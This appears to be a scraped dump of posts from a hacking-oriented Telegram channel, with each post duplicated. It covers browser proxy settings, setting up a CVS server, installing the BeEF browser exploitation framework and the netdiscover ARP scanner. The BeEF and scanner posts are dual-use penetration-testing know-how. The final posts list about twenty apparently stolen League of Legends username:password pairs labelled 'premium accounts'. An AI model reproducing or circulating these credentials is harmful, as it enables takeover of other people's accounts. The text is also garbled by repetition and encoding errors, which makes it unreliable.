β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How to change proxy settings in Browsers :
t.me/UndercodeTesting
π¦ Mozilla Firefox
1. Open Mozilla Firefox.
2. Click on Tools then click on Optionsβ¦.
3. Click on the Advance tab, then click on the Network sub-tab and finally on the Settings⦠button.
4. Tick the Manual Proxy Configuration: radio button.
5. In the HTTP Proxy: box, type the IP address of the proxy server.
6. In the Port: box, type the in the port number that is used by the proxy server.
7. Click OK to close the Connection Settings window.
8. Click OK to close the Options window.
9. DONE
π¦ Internet Explorer
1. On the Tools menu in Internet Explorer, click Internet Options, click the Connections tab, and then click LAN Settings.
2. Under Proxy server, click to select the Use a proxy server for your LAN check box.
3. In the Address box, type the IP address of the proxy server.
4. In the Port box, type the port number that is used by the proxy server for client connections (by default, 8080).
5. You can click to select the Bypass proxy server for local addresses check box if you do not want the proxy server computer to be used when you connect to a computer on the local network (this may speed up performance).
6. Click OK to close the LAN Settings dialog box.
7. Click OK again to close the Internet Options dialog box.
π¦ proxy settings In Google Chrome.
* To change proxy settings: Click βCustomize and control Google Chromeβ icon right under the βwindow closeβ button.
* A popup menu will be dipslayed. Click βOptionsβ.
* Select the βUnder the Hoodβ tab.
* Scroll down and Click βchange proxy settingsβ button.
* A popup dialog will be display. Select the Connections tab on this dialg.
* If you are using LAN, click βLAN Settingsβ button. If you are using Dial-up or Virtual Private Network connection, select necessary connection and click βSettingsβ button.
* Make sure the βautomatically detect proxy settingsβ and βuse a proxy automatic configuration scriptβ options are not checked.
* In the βProxy Serverβ area, click the check box next to Use a proxy server for this connection.
* If nessesary, enable βbypass proxy server for local addressesβ.
* Click the βAdvancedβ button and set Proxy Server address (proxy IP), proxy server port.
* Click OK.
* Done
π¦ proxy settings in Safari.
* To change proxy settings: Open Safari
* Click Safari on top of the screen.
* Click βPreferencesβ.
* In the menu bar at the top of the window, Click βAdvancedβ.
* Click on the βChange Settingsβ button next to the Proxies label
* Click on the check box button next to Web Proxy (HTTP)
* Enter proxy server and port information
* Select βApply Nowβ to save settings.
* Done.
powered by wiki
@undercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How to change proxy settings in Browsers :
t.me/UndercodeTesting
π¦ Mozilla Firefox
1. Open Mozilla Firefox.
2. Click on Tools then click on Optionsβ¦.
3. Click on the Advance tab, then click on the Network sub-tab and finally on the Settings⦠button.
4. Tick the Manual Proxy Configuration: radio button.
5. In the HTTP Proxy: box, type the IP address of the proxy server.
6. In the Port: box, type the in the port number that is used by the proxy server.
7. Click OK to close the Connection Settings window.
8. Click OK to close the Options window.
9. DONE
π¦ Internet Explorer
1. On the Tools menu in Internet Explorer, click Internet Options, click the Connections tab, and then click LAN Settings.
2. Under Proxy server, click to select the Use a proxy server for your LAN check box.
3. In the Address box, type the IP address of the proxy server.
4. In the Port box, type the port number that is used by the proxy server for client connections (by default, 8080).
5. You can click to select the Bypass proxy server for local addresses check box if you do not want the proxy server computer to be used when you connect to a computer on the local network (this may speed up performance).
6. Click OK to close the LAN Settings dialog box.
7. Click OK again to close the Internet Options dialog box.
π¦ proxy settings In Google Chrome.
* To change proxy settings: Click βCustomize and control Google Chromeβ icon right under the βwindow closeβ button.
* A popup menu will be dipslayed. Click βOptionsβ.
* Select the βUnder the Hoodβ tab.
* Scroll down and Click βchange proxy settingsβ button.
* A popup dialog will be display. Select the Connections tab on this dialg.
* If you are using LAN, click βLAN Settingsβ button. If you are using Dial-up or Virtual Private Network connection, select necessary connection and click βSettingsβ button.
* Make sure the βautomatically detect proxy settingsβ and βuse a proxy automatic configuration scriptβ options are not checked.
* In the βProxy Serverβ area, click the check box next to Use a proxy server for this connection.
* If nessesary, enable βbypass proxy server for local addressesβ.
* Click the βAdvancedβ button and set Proxy Server address (proxy IP), proxy server port.
* Click OK.
* Done
π¦ proxy settings in Safari.
* To change proxy settings: Open Safari
* Click Safari on top of the screen.
* Click βPreferencesβ.
* In the menu bar at the top of the window, Click βAdvancedβ.
* Click on the βChange Settingsβ button next to the Proxies label
* Click on the check box button next to Web Proxy (HTTP)
* Enter proxy server and port information
* Select βApply Nowβ to save settings.
* Done.
powered by wiki
@undercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ CVS Server Quick GuideCVS server Quick Guide by Undercode
t.me/undercodeTesting
π¦ 1) introduction
CVS is the Concurrent Version System (Concurrent Versions System) is an abbreviation for version management. If you have ever participated in a project developed by many people, you must have such a painful experience: because multiple people modify the same file at the same time, the program that you worked hard to modify was completely deleted by others. In addition, if your software / program has been released in three versions, and the user requires you to modify the second version at this time, you may cry because you only keep the latest version. Another thing is that you have made some changes to the program, but the changes are very few. You only want to send a difference file between the two versions to colleagues in the distance, so that you can avoid problems such as the mailbox is not large enough, and the network speed is too slow. . In order to solve problems like this, as well as generating patch files, historical revisions, etc., a group of hackers (commendations) developed CVS on the basis of SCCS and RCS, which were very mature in the original Unix system. (SCCS: Source Code Control System, RCS: Revision Control System).
2) The basic working idea of ββCVS is this: build a warehouse on a server, and the source code of many different projects can be stored in the warehouse. These source programs are managed by the warehouse administrator. In this way, it seems as if only one person is modifying the file. Avoid conflicts. Before using the warehouse, each user must first download the project files in the warehouse to the local. Any changes made by the user are first made locally, and then submitted with the cvs command, which is uniformly modified by the cvs warehouse administrator. In this way, you can track file changes, conflict control, and so on.
3) Since CVS is a typical C / S structured software, it is also divided into two parts, server and client. However, most CVS software combines them into one. Here we discuss the use of cvs from the perspective of the server and the client.
π¦ Cvs server installation :
> First make sure that the system has cvs installed:
[root @ mail xinetd.d] # rpm -qa | grep cvs
cvs-1.11.1p1-3
If the command output is similar to the above output, it means that the system has installed cvs, otherwise you need to install the cvs rpm package from the installation CD .
1. Create a CVS owner user:
# useradd -d / cvsroot cvs
# chmod 771 / cv sroot
2. Establish a CVS warehouse (initialize cvs)
# su cvs
$ cvs -d / cvsroot init
$ exit
#
4. Start the cvs server
in / etc Create a file cvspserver in the /xinetd.d/ directory, the content is as follows:
# default: on
# description: The cvs server sessions;
service cvspserver
{
socket_type = stream
wait = no
user = root
server = / usr / bin / cvs
server_args = -f --allow-root = / cvsroot pserver
log_on_failure + = USERID
only_from = 192.168.0.0/24
}
Among them only_from is used to restrict access, you can not according to the actual situation or modify.
Modify the file permissions:
# chmod 644 cvspserver
and restart xinetd:
# /etc/rc.d/init.d/xined restart
Then check whether the cvs server is already running:
[root @ mail xinetd.d] # netstat -lnp | grep 2401
tcp 0 0 0.0.0.0:2401 0.0.0.0:* LISTEN 7866 / xinetd
indicates that the cvs server is already running.
Fifth, create a user to access cvs The cvs user
created earlier is a cvs warehouse management user, and in order to allow users to access, you also need an access user:
# useradd cvspub
# usemod -G cvs cvspub
Here, a user cvspub is added, and the The user is added to the cvs group.
Six, manage cvs server
π¦ CVS Server Quick GuideCVS server Quick Guide by Undercode
t.me/undercodeTesting
π¦ 1) introduction
CVS is the Concurrent Version System (Concurrent Versions System) is an abbreviation for version management. If you have ever participated in a project developed by many people, you must have such a painful experience: because multiple people modify the same file at the same time, the program that you worked hard to modify was completely deleted by others. In addition, if your software / program has been released in three versions, and the user requires you to modify the second version at this time, you may cry because you only keep the latest version. Another thing is that you have made some changes to the program, but the changes are very few. You only want to send a difference file between the two versions to colleagues in the distance, so that you can avoid problems such as the mailbox is not large enough, and the network speed is too slow. . In order to solve problems like this, as well as generating patch files, historical revisions, etc., a group of hackers (commendations) developed CVS on the basis of SCCS and RCS, which were very mature in the original Unix system. (SCCS: Source Code Control System, RCS: Revision Control System).
2) The basic working idea of ββCVS is this: build a warehouse on a server, and the source code of many different projects can be stored in the warehouse. These source programs are managed by the warehouse administrator. In this way, it seems as if only one person is modifying the file. Avoid conflicts. Before using the warehouse, each user must first download the project files in the warehouse to the local. Any changes made by the user are first made locally, and then submitted with the cvs command, which is uniformly modified by the cvs warehouse administrator. In this way, you can track file changes, conflict control, and so on.
3) Since CVS is a typical C / S structured software, it is also divided into two parts, server and client. However, most CVS software combines them into one. Here we discuss the use of cvs from the perspective of the server and the client.
π¦ Cvs server installation :
> First make sure that the system has cvs installed:
[root @ mail xinetd.d] # rpm -qa | grep cvs
cvs-1.11.1p1-3
If the command output is similar to the above output, it means that the system has installed cvs, otherwise you need to install the cvs rpm package from the installation CD .
1. Create a CVS owner user:
# useradd -d / cvsroot cvs
# chmod 771 / cv sroot
2. Establish a CVS warehouse (initialize cvs)
# su cvs
$ cvs -d / cvsroot init
$ exit
#
4. Start the cvs server
in / etc Create a file cvspserver in the /xinetd.d/ directory, the content is as follows:
# default: on
# description: The cvs server sessions;
service cvspserver
{
socket_type = stream
wait = no
user = root
server = / usr / bin / cvs
server_args = -f --allow-root = / cvsroot pserver
log_on_failure + = USERID
only_from = 192.168.0.0/24
}
Among them only_from is used to restrict access, you can not according to the actual situation or modify.
Modify the file permissions:
# chmod 644 cvspserver
and restart xinetd:
# /etc/rc.d/init.d/xined restart
Then check whether the cvs server is already running:
[root @ mail xinetd.d] # netstat -lnp | grep 2401
tcp 0 0 0.0.0.0:2401 0.0.0.0:* LISTEN 7866 / xinetd
indicates that the cvs server is already running.
Fifth, create a user to access cvs The cvs user
created earlier is a cvs warehouse management user, and in order to allow users to access, you also need an access user:
# useradd cvspub
# usemod -G cvs cvspub
Here, a user cvspub is added, and the The user is added to the cvs group.
Six, manage cvs server
Manage cvs server. The server is ready for use. Now everyone is most concerned about how to manage the server. For example, I want some people to have the authority to read and / or write the CVS repository, but what if I do nβt want to give it system authority? It is not difficult, after the initialization of cvs, there is a CVSROOT directory in the main directory of the administrator user (here is the cvs user), and there are three configuration files in this directory: passwd, readers, writers. We can configure the CVS server by setting these three files. The functions of these files are described below:
passwd: the user list file of the cvs user. Its format is much like the shadow file:
{cvs user name}: [encrypted password ]: [Equivalent system user name]
If you want a user to be only a cvs user, not a system user, then you need to set this file. This file may not exist immediately after installation, you need to be a cvs administrator (su cvs) Created by the user manually, of course, according to the above format; the
second field is the user βs encrypted password, which is encrypted with crypt (3), you can write a program to do the encryption yourself, or you can use two lazy methods : Create a system user with the same name as the cvs user. The password is the password of the cvs user to be prepared for it. After the creation, copy the second field of the user from / etc / shadow, and then delete the user. This method is more convenient for a small number of users. It is not suitable if there are more people, and there are hidden security risks of conflict conditions (race condition), and root permissions are not very good, but it is a matter of rights and interests; another method Is to use apche's htpasswd command to create a passwd user, add users only need htpasswd passwd username to add users to the passwd file, but need to add a "": "" colon at the end of the corresponding line in the file and the corresponding equivalent system user The best thing is to write a program to generate this passwd file.
The third field is the equivalent system user name. In fact, it is the right to give a cvs user an equivalent system user. See the following example to understand its function.
readers: A user list file with cvs read permission is a one-dimensional list. The users in this file
only have read access to cvs .
writers: A list file of users with cvs write permissions, like readers, is a one-dimensional list. The users in this file have write permission for cvs.
The above three files may not exist during the default installation, we need to create our own, well, now let us use an example to teach it. Suppose we have the following users who need to use cvs:
cvsuser1, cvsuser2, henry, betty, anonymous
where laser and gumpwu are system users, and henry, betty, anonymous we do not want to give system user permissions, and betty and anonymous are both read-only Users, and anonymous even has no password.
Then edit cvs administrator home directory CVSROOT / passwd file, you add the following lines:
Laser: $ xxefajfka; faffa33: cvspub
gumpwu: $ ajfaal; 323r0ofeeanv: cvspub
henry: $ fajkdpaieje: cvspub
Betty: fjkal; ffjieinfn /: cvspub
Anonymous: : cvspub
Note: The second field above (the delimiter is :) is the cipher text password, you have to use the program or use my local method to generate.
Edit readers file, add the following lines:
Anonymous
Betty
editor writer file, add the following lines:
Laser
gumpwu
henry
so ok, then you are landing a few test users, you will find everything is ok. I don't want to say more about the principles and explanations here. In fact, it is very simple, and the concept of system management users is the same.
Seven, the establishment of a new CVS project
passwd: the user list file of the cvs user. Its format is much like the shadow file:
{cvs user name}: [encrypted password ]: [Equivalent system user name]
If you want a user to be only a cvs user, not a system user, then you need to set this file. This file may not exist immediately after installation, you need to be a cvs administrator (su cvs) Created by the user manually, of course, according to the above format; the
second field is the user βs encrypted password, which is encrypted with crypt (3), you can write a program to do the encryption yourself, or you can use two lazy methods : Create a system user with the same name as the cvs user. The password is the password of the cvs user to be prepared for it. After the creation, copy the second field of the user from / etc / shadow, and then delete the user. This method is more convenient for a small number of users. It is not suitable if there are more people, and there are hidden security risks of conflict conditions (race condition), and root permissions are not very good, but it is a matter of rights and interests; another method Is to use apche's htpasswd command to create a passwd user, add users only need htpasswd passwd username to add users to the passwd file, but need to add a "": "" colon at the end of the corresponding line in the file and the corresponding equivalent system user The best thing is to write a program to generate this passwd file.
The third field is the equivalent system user name. In fact, it is the right to give a cvs user an equivalent system user. See the following example to understand its function.
readers: A user list file with cvs read permission is a one-dimensional list. The users in this file
only have read access to cvs .
writers: A list file of users with cvs write permissions, like readers, is a one-dimensional list. The users in this file have write permission for cvs.
The above three files may not exist during the default installation, we need to create our own, well, now let us use an example to teach it. Suppose we have the following users who need to use cvs:
cvsuser1, cvsuser2, henry, betty, anonymous
where laser and gumpwu are system users, and henry, betty, anonymous we do not want to give system user permissions, and betty and anonymous are both read-only Users, and anonymous even has no password.
Then edit cvs administrator home directory CVSROOT / passwd file, you add the following lines:
Laser: $ xxefajfka; faffa33: cvspub
gumpwu: $ ajfaal; 323r0ofeeanv: cvspub
henry: $ fajkdpaieje: cvspub
Betty: fjkal; ffjieinfn /: cvspub
Anonymous: : cvspub
Note: The second field above (the delimiter is :) is the cipher text password, you have to use the program or use my local method to generate.
Edit readers file, add the following lines:
Anonymous
Betty
editor writer file, add the following lines:
Laser
gumpwu
henry
so ok, then you are landing a few test users, you will find everything is ok. I don't want to say more about the principles and explanations here. In fact, it is very simple, and the concept of system management users is the same.
Seven, the establishment of a new CVS project
π¦ Generally we already have one or more projects, so that we can use the following steps to generate a new CVS project.
Putting a project file in CVs for version control is called import in CVS terminology. As you can see from the name, you need to make some preparations before importing.
The basic requirement for input operations is to have a "clean" directory structure. "" Clean "" means that files that do not require version control are removed (such as files generated by compilation, backup files, etc.). This is important if the project has been started for a while. There may be some files in the directory that you don't plan to put under version control, but you want to put them here. In this case, you need to remove them before entering and then move them back.
Note that CVS believes that empty directories do not exist. If you want to add a directory that contains neither files nor subdirectories, you need to create a dummy file under it. It is recommended that you create a file named README.txt, which contains a brief description of the directory.
Enter the directory of the existing project, for example, cvstest:
$ cd cvstest
Run command to import the project file into the cvs warehouse:
$ cvs import -m "" this is a cvstest project "" cvstest v_0_0_1 start
Description: import is one of the commands of cvs, which means to input the project file to the cvs warehouse.
The string after the -m parameter is the description text, which describes the project. If the -m parameter is not added, cvs will automatically run an editor (usually vi, but you can change it to your favorite by modifying the environment variable EDITOR Editor) allows you to enter information, cvstest is the project name (actually the name of the warehouse, it will be stored in the warehouse named after this name on the CVS server)
v_0_0_1 is the total mark of this branch. Useless (or not commonly used)
start is a mark that identifies the input level of the file each time it is imported, and is useless.
In this way, we have established a CVS warehouse, and then, we can delete the files of this test project, and experiment how to obtain files from the warehouse.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Putting a project file in CVs for version control is called import in CVS terminology. As you can see from the name, you need to make some preparations before importing.
The basic requirement for input operations is to have a "clean" directory structure. "" Clean "" means that files that do not require version control are removed (such as files generated by compilation, backup files, etc.). This is important if the project has been started for a while. There may be some files in the directory that you don't plan to put under version control, but you want to put them here. In this case, you need to remove them before entering and then move them back.
Note that CVS believes that empty directories do not exist. If you want to add a directory that contains neither files nor subdirectories, you need to create a dummy file under it. It is recommended that you create a file named README.txt, which contains a brief description of the directory.
Enter the directory of the existing project, for example, cvstest:
$ cd cvstest
Run command to import the project file into the cvs warehouse:
$ cvs import -m "" this is a cvstest project "" cvstest v_0_0_1 start
Description: import is one of the commands of cvs, which means to input the project file to the cvs warehouse.
The string after the -m parameter is the description text, which describes the project. If the -m parameter is not added, cvs will automatically run an editor (usually vi, but you can change it to your favorite by modifying the environment variable EDITOR Editor) allows you to enter information, cvstest is the project name (actually the name of the warehouse, it will be stored in the warehouse named after this name on the CVS server)
v_0_0_1 is the total mark of this branch. Useless (or not commonly used)
start is a mark that identifies the input level of the file each time it is imported, and is useless.
In this way, we have established a CVS warehouse, and then, we can delete the files of this test project, and experiment how to obtain files from the warehouse.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2020 updated The Browser Exploitation Framework Project https://beefproject.com
fb.com/undercodeTesting
π¦ πβπππΈπππππΈπππβ & βπβ :
1) In order to install BeEF and RVM you will need to install Git and Curl first, as they do not come out of the box with Ubuntu.
$ sudo apt-get install git
$ sudo apt-get install curl
2) To install RVM, firstly go to https://rvm.io/rvm/install and install the GPG keys. Then install RVM, without dependencies:
$ \curl -sSL https://get.rvm.io | bash -s -- --autolibs=install-packages
Now install those dependencies as root while in the applications users $HOME directory:
$ sudo .rvm/bin/rvm requirements
3) Now that the dependencies are installed we need to install the stable releases of both RVM and Ruby. As the application user enter:
$ \curl -sSL https://get.rvm.io | bash -s stable --ruby
4) BeEF requires Ruby 2.5.x. Before navigating to the beef directory run:
$ rvm install "ruby-2.5.3"
5) Then simply reload your shell!
You can verify your installation of RVM and Ruby by running:
$ rvm -v
$ ruby -v
5) Once a suitable version of Ruby is installed, run the install script in the BeEF directory:
$ ./install
This script installs the required operating system packages and all the prerequisite Ruby gems.
6) Upon successful installation, be sure to read the Configuration page on the wiki for important details on configuring and securing BeEF.
7) Start BeEF
To start BeEF, first change the username and password config.yaml and then simply run:
$ ./beef
π¦Testing
If you want to install the test pre-requisites just run:
$ bundle install --with test
This will install the pre-requisite gem's for tests.
If you want to run the test suit run:
$ bundle exec rake
π¦ tested by undercode on
> ubuntu last version
@UnderodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2020 updated The Browser Exploitation Framework Project https://beefproject.com
fb.com/undercodeTesting
π¦ πβπππΈπππππΈπππβ & βπβ :
1) In order to install BeEF and RVM you will need to install Git and Curl first, as they do not come out of the box with Ubuntu.
$ sudo apt-get install git
$ sudo apt-get install curl
2) To install RVM, firstly go to https://rvm.io/rvm/install and install the GPG keys. Then install RVM, without dependencies:
$ \curl -sSL https://get.rvm.io | bash -s -- --autolibs=install-packages
Now install those dependencies as root while in the applications users $HOME directory:
$ sudo .rvm/bin/rvm requirements
3) Now that the dependencies are installed we need to install the stable releases of both RVM and Ruby. As the application user enter:
$ \curl -sSL https://get.rvm.io | bash -s stable --ruby
4) BeEF requires Ruby 2.5.x. Before navigating to the beef directory run:
$ rvm install "ruby-2.5.3"
5) Then simply reload your shell!
You can verify your installation of RVM and Ruby by running:
$ rvm -v
$ ruby -v
5) Once a suitable version of Ruby is installed, run the install script in the BeEF directory:
$ ./install
This script installs the required operating system packages and all the prerequisite Ruby gems.
6) Upon successful installation, be sure to read the Configuration page on the wiki for important details on configuring and securing BeEF.
7) Start BeEF
To start BeEF, first change the username and password config.yaml and then simply run:
$ ./beef
π¦Testing
If you want to install the test pre-requisites just run:
$ bundle install --with test
This will install the pre-requisite gem's for tests.
If you want to run the test suit run:
$ bundle exec rake
π¦ tested by undercode on
> ubuntu last version
@UnderodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Beefproject
BeEF - The Browser Exploitation Framework Project
BeEF is a security tool, allowing a penetration tester or system administrator additional attack vectors when assessing the posture of a target
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Netdiscover is a network address discovering
tool, developed mainly for those wireless networks without dhcp server, it
also works on hub/switched networks. Its based on arp packets, it will send arp
requests and sniff for replys.
instagram.com/undercodeTesting
π¦REQUIREMENTS :
Requeriments
============
- libpcap
- libnet > 1.1.2
- Tested to work on Linux, Solaris MacOS X and OpenBSD, other unixes may work
π¦ πβπππΈπππππΈπππβ & βπβ :
1) git clone https://github.com/alexxy/netdiscover
2) cd netdiscover
3) $ sh update-oui-database.sh (optional)
4) $ cmake .
5) $ make
6) # make install
π¦ HOW TO USE :
> ./netdiscover [-i device] [-r range | -p] [-s time] [-n node] [-c count] [-f] [-S]
-i device
The network device to sniff at and inject packets. If no device was
specified, first available will be used.
-r range
Scan a given range instead of auto scan. Valid range values are:
192.168.0.0/24, 192.168.0.0/16 or 192.168.0.0/8
-p
Enable passive mode do not send anything, only sniff
-s time
It will sleep given time in milliseconds between each arp request
injection. (default 1)
-c count
Number of times to send each arp reques. Usefull for networks with
packet loss, so it will scan given times for each host.
-n node
Last ip octet used for scanning as source host, you can change it
if the default host is already used (from 2 to 253) (default 66)
-S
Enable sleep time supression betwen each request. I will sleep each 255
scanned hosts instead of do it by each one, this mode was used on 0.3 beta4
and older releases. Avoid this option on networks with packet lossing,
or in wireless networks with low signal level. (also called hardcore mode)
-f
Enable fastmode scan, it will only scan for hosts .1, .100, .254 on each
network, usefull when searching for addresses being used, after find one
you can make a specific range scan to see online boxes.
Scanned hosts can be easily modified at fast_ips[] array on main.c source.
If -p or -r options are not used, netdiscover will automatically scan for common
lan addresses. Those address lists can be modified at common_net[] on main.c
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Netdiscover is a network address discovering
tool, developed mainly for those wireless networks without dhcp server, it
also works on hub/switched networks. Its based on arp packets, it will send arp
requests and sniff for replys.
instagram.com/undercodeTesting
π¦REQUIREMENTS :
Requeriments
============
- libpcap
- libnet > 1.1.2
- Tested to work on Linux, Solaris MacOS X and OpenBSD, other unixes may work
π¦ πβπππΈπππππΈπππβ & βπβ :
1) git clone https://github.com/alexxy/netdiscover
2) cd netdiscover
3) $ sh update-oui-database.sh (optional)
4) $ cmake .
5) $ make
6) # make install
π¦ HOW TO USE :
> ./netdiscover [-i device] [-r range | -p] [-s time] [-n node] [-c count] [-f] [-S]
-i device
The network device to sniff at and inject packets. If no device was
specified, first available will be used.
-r range
Scan a given range instead of auto scan. Valid range values are:
192.168.0.0/24, 192.168.0.0/16 or 192.168.0.0/8
-p
Enable passive mode do not send anything, only sniff
-s time
It will sleep given time in milliseconds between each arp request
injection. (default 1)
-c count
Number of times to send each arp reques. Usefull for networks with
packet loss, so it will scan given times for each host.
-n node
Last ip octet used for scanning as source host, you can change it
if the default host is already used (from 2 to 253) (default 66)
-S
Enable sleep time supression betwen each request. I will sleep each 255
scanned hosts instead of do it by each one, this mode was used on 0.3 beta4
and older releases. Avoid this option on networks with packet lossing,
or in wireless networks with low signal level. (also called hardcore mode)
-f
Enable fastmode scan, it will only scan for hosts .1, .100, .254 on each
network, usefull when searching for addresses being used, after find one
you can make a specific range scan to see online boxes.
Scanned hosts can be easily modified at fast_ips[] array on main.c source.
If -p or -r options are not used, netdiscover will automatically scan for common
lan addresses. Those address lists can be modified at common_net[] on main.c
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - alexxy/netdiscover: netdiscover
netdiscover. Contribute to alexxy/netdiscover development by creating an account on GitHub.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦League of Legends Premium Accounts verified
t.me/undercodeTesting
franzougame:franzou57 Level : 42 | BE : 1570 | RP : 198 | RefundsRemaining : 3 | emailVerified : true | ChampsCount : 23 | SkinsCount : 14 |
supergallego:pepillo69926992 | Level : 152 | BE : 4221 | RP : 89 | RefundsRemaining : 1 | emailVerified : true | ChampsCount : 126 | SkinsCount : 51 |
felt83:Luffy830 | Level : 35 | BE : 1009 | RP : 0 | RefundsRemaining : 0 | emailVerified : true | ChampsCount : 24 | SkinsCount : 3 |
dzelric:aboud032003 | Level : 8 | BE : 5105 | RP : 15 | RefundsRemaining : 3 | emailVerified : true | ChampsCount : 3 | SkinsCount : 1 |
kosior1996:kotek2909 | Level : 30 | BE : 2705 | RP : 110 | RefundsRemaining : 1 | emailVerified : true | ChampsCount : 28 | SkinsCount : 2 |
thorthenoob:Email172801 | Level : 7 | BE : 3570 | RP : 0 | RefundsRemaining : 3 | emailVerified : true | ChampsCount : 4 | SkinsCount : 0 |
technologeek17:laurent474 | Level : 19 | BE : 2025 | RP : 315 | RefundsRemaining : 2 | emailVerified : true | ChampsCount : 25 | SkinsCount : 2 |
laer4167:ggp84bvkk | Level : 16 | BE : 5782 | RP : 0 | RefundsRemaining : 3 | emailVerified : true | ChampsCount : 7 | SkinsCount : 3 |
mafioso97:DG9ottobre1997 | Level : 30 | BE : 2275 | RP : 310 | RefundsRemaining : 1 | emailVerified : true | ChampsCount : 38 | SkinsCount : 12 |
breakstuff155:oriebir123 | Level : 16 | BE : 1759 | RP : 0 | RefundsRemaining : 3 | emailVerified : true | ChampsCount : 9 | SkinsCount : 1 |
faiizenn:2702TOMI | Level : 97 | BE : 556 | RP : 124 | RefundsRemaining : 0 | emailVerified : true | ChampsCount : 91 | SkinsCount : 89 |
xavikuervo:jackskipper1987 | Level : 169 | BE : 9161 | RP : 115 | RefundsRemaining : 1 | emailVerified : true | ChampsCount : 148 | SkinsCount : 73 |
kaximpo:hoyo1805 | Level : 23 | BE : 389 | RP : 25 | RefundsRemaining : 3 | emailVerified : true | ChampsCount : 20 | SkinsCount : 2 |
pifpaf451:Bibi451021 | Level : 31 | BE : 2726 | RP : 40 | RefundsRemaining : 1 | emailVerified : true | ChampsCount : 37 | SkinsCount : 14 |
flotrethcq:legolegoflo0 | Level : 161 | BE : 8760 | RP : 9 | RefundsRemaining : 1 | emailVerified : true | ChampsCount : 148 | SkinsCount : 66 |
alexopri3:avatar5137 Level : 11 | BE : 505 | RP : 22 | RefundsRemaining : 3 | emailVerified : true | ChampsCount : 12 | SkinsCount : 2 |
naugtyboyfr:lenae1996 | Level : 15 | BE : 1910 | RP : 0 | RefundsRemaining : 3 | emailVerified : true | ChampsCount : 9 | SkinsCount : 0 |
spirigan:32noispol | Level : 28 | BE : 3042 | RP : 53 | RefundsRemaining : 1 | emailVerified : true | ChampsCount : 13 | SkinsCount : 6 |
errorkappa:ignac2003 | Level : 10 | BE : 2715 | RP : 0 | RefundsRemaining : 3 | emailVerified : true | ChampsCount : 7 | SkinsCount : 0 |
makinapro13:davidpro69 | Level : 30 | BE : 2388 | RP : 98 | RefundsRemaining : 1 | emailVerified : true | ChampsCount : 43 | SkinsCount : 6 |
aurumr3k3r:raisha18 | Level : 16 | BE : 114 | RP : 0 | RefundsRemaining : 3 | emailVerified : true | ChampsCount : 16 | SkinsCount : 4 |
winampcz:Momadik125 | Level : 10 | BE : 3842 | RP : 140 | RefundsRemaining : 3 | emailVerified : true | ChampsCount : 1 | SkinsCount : 1 |
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦League of Legends Premium Accounts verified
t.me/undercodeTesting
franzougame:franzou57 Level : 42 | BE : 1570 | RP : 198 | RefundsRemaining : 3 | emailVerified : true | ChampsCount : 23 | SkinsCount : 14 |
supergallego:pepillo69926992 | Level : 152 | BE : 4221 | RP : 89 | RefundsRemaining : 1 | emailVerified : true | ChampsCount : 126 | SkinsCount : 51 |
felt83:Luffy830 | Level : 35 | BE : 1009 | RP : 0 | RefundsRemaining : 0 | emailVerified : true | ChampsCount : 24 | SkinsCount : 3 |
dzelric:aboud032003 | Level : 8 | BE : 5105 | RP : 15 | RefundsRemaining : 3 | emailVerified : true | ChampsCount : 3 | SkinsCount : 1 |
kosior1996:kotek2909 | Level : 30 | BE : 2705 | RP : 110 | RefundsRemaining : 1 | emailVerified : true | ChampsCount : 28 | SkinsCount : 2 |
thorthenoob:Email172801 | Level : 7 | BE : 3570 | RP : 0 | RefundsRemaining : 3 | emailVerified : true | ChampsCount : 4 | SkinsCount : 0 |
technologeek17:laurent474 | Level : 19 | BE : 2025 | RP : 315 | RefundsRemaining : 2 | emailVerified : true | ChampsCount : 25 | SkinsCount : 2 |
laer4167:ggp84bvkk | Level : 16 | BE : 5782 | RP : 0 | RefundsRemaining : 3 | emailVerified : true | ChampsCount : 7 | SkinsCount : 3 |
mafioso97:DG9ottobre1997 | Level : 30 | BE : 2275 | RP : 310 | RefundsRemaining : 1 | emailVerified : true | ChampsCount : 38 | SkinsCount : 12 |
breakstuff155:oriebir123 | Level : 16 | BE : 1759 | RP : 0 | RefundsRemaining : 3 | emailVerified : true | ChampsCount : 9 | SkinsCount : 1 |
faiizenn:2702TOMI | Level : 97 | BE : 556 | RP : 124 | RefundsRemaining : 0 | emailVerified : true | ChampsCount : 91 | SkinsCount : 89 |
xavikuervo:jackskipper1987 | Level : 169 | BE : 9161 | RP : 115 | RefundsRemaining : 1 | emailVerified : true | ChampsCount : 148 | SkinsCount : 73 |
kaximpo:hoyo1805 | Level : 23 | BE : 389 | RP : 25 | RefundsRemaining : 3 | emailVerified : true | ChampsCount : 20 | SkinsCount : 2 |
pifpaf451:Bibi451021 | Level : 31 | BE : 2726 | RP : 40 | RefundsRemaining : 1 | emailVerified : true | ChampsCount : 37 | SkinsCount : 14 |
flotrethcq:legolegoflo0 | Level : 161 | BE : 8760 | RP : 9 | RefundsRemaining : 1 | emailVerified : true | ChampsCount : 148 | SkinsCount : 66 |
alexopri3:avatar5137 Level : 11 | BE : 505 | RP : 22 | RefundsRemaining : 3 | emailVerified : true | ChampsCount : 12 | SkinsCount : 2 |
naugtyboyfr:lenae1996 | Level : 15 | BE : 1910 | RP : 0 | RefundsRemaining : 3 | emailVerified : true | ChampsCount : 9 | SkinsCount : 0 |
spirigan:32noispol | Level : 28 | BE : 3042 | RP : 53 | RefundsRemaining : 1 | emailVerified : true | ChampsCount : 13 | SkinsCount : 6 |
errorkappa:ignac2003 | Level : 10 | BE : 2715 | RP : 0 | RefundsRemaining : 3 | emailVerified : true | ChampsCount : 7 | SkinsCount : 0 |
